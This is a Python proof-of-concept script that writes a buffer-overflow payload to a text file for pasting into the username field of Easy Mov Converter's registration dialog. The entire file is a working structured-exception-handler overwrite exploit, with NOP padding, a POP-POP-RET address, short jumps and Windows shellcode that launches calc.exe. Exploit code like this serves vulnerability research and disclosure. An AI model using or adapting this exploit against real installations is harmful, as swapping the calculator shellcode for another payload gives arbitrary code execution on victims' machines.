import os


# Execute .py and payload will be generated on file POCPayload.txt
# Open file on notepad and copy ascii output into username field of Easy Mov Converter Register function

buf = 62 * "\x90" + "\xeb\x08" + 32 * "\x90"
buf2 = 697 * "\x41"

# Possible SEH JUMPS
# 1002CCAF
# 1002CE91
# 1002CF71
# 10011D8B
# 100143A5
# 10014530


seh = "\xaf\xcc\x02\x10" # POP; POP; RET
jmpshort = "\x90\x90\xeb\x08" # JMP SHORT
jmpbuf = "\xE9\x27\xFC\xFF\xFF" # JMP TO shellcode


shellcode = "\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"
shellcode += "\x1c\x8b\x1b\x8b\x1b\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3"
shellcode += "\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf8\x8b\x4b\x24"
shellcode += "\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53\x14"
shellcode += "\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\x18"
shellcode += "\x31\xc9\xfc\x8b\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x08\xf3\xa6\x74"
shellcode += "\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4\x8b\x55\xf0\x66\x8b\x04\x41"
shellcode += "\x8b\x04\x82\x03\x45\xfc\xc3\xba\x78\x78\x65\x63\xc1\xea\x08\x52"
shellcode += "\x68\x57\x69\x6e\x45\x89\x65\x18\xe8\xb8\xff\xff\xff\x31\xc9\x51"
shellcode += "\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x89\xe3\x41\x51\x53\xff"
shellcode += "\xd0\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f"
shellcode += "\x63\x68\x45\x78\x69\x74\x89\x65\x18\xe8\x87\xff\xff\xff\x31\xd2"
shellcode += "\x52\xff\xd0"

fruit = buf + shellcode + buf2 + jmpshort + seh + 13 * "\x90" + jmpbuf

# FILE with payload
POCPayload = open("POCPayload.txt", "wb")


POCPayload.write(fruit)
POCPayload.close()